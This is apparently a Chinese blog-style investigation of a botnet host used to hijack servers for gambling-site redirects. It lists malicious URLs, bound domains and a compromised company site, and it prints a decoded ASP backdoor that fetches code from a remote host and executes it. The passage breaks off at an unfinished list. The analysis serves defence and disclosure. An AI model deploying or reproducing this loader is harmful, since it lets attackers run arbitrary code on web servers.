已知的文件有:
http://45.123.101.251:5520/a.jpg
http://45.123.101.251:5520/123.jpg
http://45.123.101.251:5520/671.js
http://45.123.101.251:5520/M161.txt
http://45.123.101.251:5520/M161.txt?.html
该僵尸网络主机端口有ftp:21
phpMyAdmin999 : http://45.123.101.251:999
- 绑定过的域名如下:
- 2019-12-18-----2019-12-1819399000.com
- 2019-12-18-----2019-12-1819399b.com
- 2019-12-18-----2019-12-18974168.com
- 2019-08-10-----2019-10-10dl.v56888.com
- 2019-07-12-----2019-07-12www.v1622.com
- 2019-07-12-----2019-07-12v1622.com
- 2019-05-20-----2019-05-201366.am
- 2019-05-07-----2019-05-18512855.com
- 2019-04-14-----2019-05-14www-1366e.com
- 2019-05-12-----2019-05-121366aa.net
- 2016-11-28-----2016-11-28ylg12.com
该僵尸主机上曾经绑定的网站记录均为境外赌博网址,使用后门文件远程控制目标主机,样本文件内容(文件)为asp加密后的代码,经过解析代码如下:
<%@ LANGUAGE = VBScript%><%
Server.ScriptTimeout=999999999
UserPass="xxoo"
mNametitle ="一匹黑马"
function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End function
function PostHTTPPage(url)
dim Http
set Http=server.createobject("MSXML2.SERVERXMLHTTP.3.0")
Http.open "GET",url,false
Http.setRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.send
if Http.readystate<>4 then
exit function
End if
PostHTTPPage=bytesToBSTR(Http.responseBody,"gbk")
set http=nothing
if err.number<>0 then err.Clear
End function
dim aspCode
aspCode=CStr(Session("aspCode"))
if aspCode="" or aspCode=null or isnull(aspCode) then
aspCode=PostHTTPPage("http://45.123.101.251:5520/a.jpg")
Session("aspCode") =aspCode
End if
execute aspCode
%>△ 关于恶意病毒僵尸网络主机ip45.123.101.251分析最新后续:
1. 根据解析,当样本后门文件指向并加载该链接【http://45.123.101.251:5520/671.js】会自动加载一个全屏iframe框架 ,该恶意框架指向地址【https://sdfhu1.com/671.html】,该恶意脚本由代号【shengxiaon】的 匿名个人编写后经由各路木马网站广泛传播。
2. 再一步测探【http://45.123.101.251:5520/】伪造了名为【沈阳荣伟鸣智能技术有限公司】的主页代码,由于域名拦截故此恶意主机并不能完全将【沈阳荣伟鸣智能技术有限公司】服务器内的图片等js css文件资源窃取,所以可以看到【http://45.123.101.251:5520/】页面完全一团糟。
3. 继续测探名为【沈阳荣伟鸣智能技术有限公司】的实际域名为【http://www.rongweiming.com】,查看此网址源代码部分 发现此网址已经沦陷许久,经该网址新闻动态得知此网站管理员至少已经停止维护一年有余,经分析该网站为织梦cms模板制作,故 极大可能是由于织梦cms某版本漏洞导致此网站被挂马,由于未知原因导致该恶意代码并未显示恶意标题恶意网址等信息。
4. 进一步探测,由【http://www.rongweiming.com】主页被挂马信息解密得出以下内容:
百人牛牛,百人牛牛游戏,百人牛牛游戏平台
百人牛牛游戏▓【671311.com】▓百人牛牛游戏平台下载,真钱百人牛牛棋牌app,真人百人牛牛平台安卓版下载,用钱玩的百人牛牛集合!注册就送现金,赶紧加入吧!美女玩家陪玩,最后7天机不可失期待您的加入!
5. 继续往下探测,此【671311.com】网址为赌博网站中转页,此赌博网站均为劫持某一缺陷主机,从而导致衍生出无数以【https://******.syyt365.com/】为网址的子域名,该赌博网址常用名【K8彩乐园、百人牛牛,百人牛牛游戏,百人牛牛游戏平台】由中转页进入赌博网站主页面的时候我们会发现,该域名继承了主域名【https://syyt365.com/】的ssl证书,所以此恶意网址在主流浏览器打开均会显示为安全网站不会被轻易屏蔽,此时 有的人可能就要问了,那为啥一个赌博网站还会有ssl HTTPS安全证书,在此解答一下,一是为了不会被轻易屏蔽,二是为了坑害那些幻想网上赌博就能一夜发大财的可怜人罢了,三是 众所周知,ssl证书大概率是充钱就会有的东西,本次故事主人公 - 域名【https://syyt365.com/】配置的为 “Cloudflare免费SSL” 。该免费证书颁发的泛网址为【*.syyt365.com】,这也就导致了无论创建多少子域名都将自动继承主域名下的ssl证书,反之,如果单独授权给【www.syyt365.com】则不会造成以上证书继承的严重影响。
6. 看到这里,终于幕后被沦陷僵尸终于浮出水面了对不对。这个步骤请各位看官先自动遗忘第5步骤的主域名,让我们继续深挖僵尸主机幕后的秘密。我们接着来分析,经探测,该赌博网站服务器类型为【yunjiasu-nginx】,顾名思义,yunjiasu 等价于 云加速,云加速则是为国内大头百度公司旗下的线上云平台管理系统(此线索为锲子)。继续往下溯源,经分析此赌博网站文件图片js css等资源均存放在路径1【https://images.budiaodanle.com/ 该网址无线索,至少从名称来看是个脑残人创建的】和路径2【www.****.syyt365.com/k8/具体文件夹名称】之内,继续进行下一步,查看此赌博网站文件大部分url均为上述路径2 ,俗话说 千里之外取敌将首级才能运筹帷幄主导一场战争的节奏,直接探测主域名【https://syyt365.com/】
7. 你说惊喜不惊喜 ,好巧不巧该僵尸主机绑定的主域名竟然能 直接打开并且运行,好戏来了。
我们打开主域名,不知道你们怎么想的,我打开第一眼,真的会有公司用一行大大的汉字当logo嘛 = =!,把我雷到五雷轰顶了可以说,我们继续,经过五分钟的观察发现:该主域名网站粗糙至极各项功能除页面切换外均不能正常使用和展示,且网站尾部出现样式完全乱套的情况,由于此网站移动端没有正确配置导致移动端导航直接加载至pc端尾部,该网站联系方式竟然为4001-000-000,由此我产生了深深的怀疑,真的有公司会使用如此粗糙的网站嘛,对于我这个爱谴责的工程师来讲表示强烈网站......
8.重点来了!我们在此网站底部可以看到【 技术支持:宽敬科技】字样,接触过网站的人大多都知道,此类版权信息不是借用别人的网站模板就是站群设计雷同样式。直接超链接点进去【http://kindjob.cn/】苏州昆山IT培训机构 - 鉴定完毕......
那么由此可知,该网站很可能是该培训机构的学员的课后作业所创建的,为什么呢,往下看。我们直接搜索【纽约婚纱】关键词......可以说相当恐怖了,还有谁会说这不是批量制作的呢。
9. 总结: 该主域名网站内容是上述培训机构学员测试作业等等,由于该服务器主机根本没有入侵防护或几乎很少的主机防护措施,导致骇客成功,入侵随意种植木马间接进行服务器的远控,大量的创建赌博网站子域名进行各种方式的域名跳转,进一步给别人的网站也带来不可预估的严重后果。
经探测,该域名被恶意创建的赌博网站子域名有:
